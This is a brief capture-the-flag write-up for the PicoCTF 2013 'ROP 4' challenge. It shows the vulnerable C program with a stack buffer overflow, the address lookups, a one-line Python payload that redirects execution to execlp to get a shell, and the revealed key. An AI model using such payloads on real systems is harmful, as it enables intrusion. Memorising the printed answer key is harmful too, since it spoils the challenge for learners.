# PicoCTF 2k13 - ROP 4


$ cat /problems/ROP_4_887f7f28b1f64d7e/rop4.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

char exec_string[20];

void exec_the_string() {
 execlp(exec_string, exec_string, NULL);
}

void call_me_with_cafebabe(int cafebabe) {
 if (cafebabe == 0xcafebabe) {
  strcpy(exec_string, "/sh");
 }
}

void call_me_with_two_args(int deadbeef, int cafebabe) {
 if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) {
  strcpy(exec_string, "/bin");
 }
}

void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 512);
}

void be_nice_to_people() {
 // /bin/sh is usually symlinked to bash, which usually drops privs. Make
 // sure we don't drop privs if we exec bash, (ie if we call system()).
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
 exec_string[0] = '\0';
 be_nice_to_people();
 vulnerable_function();
}
$ ln -s /problems/ROP_4_887f7f28b1f64d7e/rop4 rop4
$ ./getenvadrr SHELL ./rop4
SHELL will be at 0xffffd881
$ objdump -t rop4 | grep execlp
08053ab0 g     F .text 0000012a execlp
$ (python -c 'print "\x90"*140 + "\xb0\x3a\x05\x08" + "\x87\xd8\xff\xff"*2 + "\x00"*4'; cat) | ./rop4
cat /problems/ROP_4_887f7f28b1f64d7e/key
fluent_in_roponese

No comments: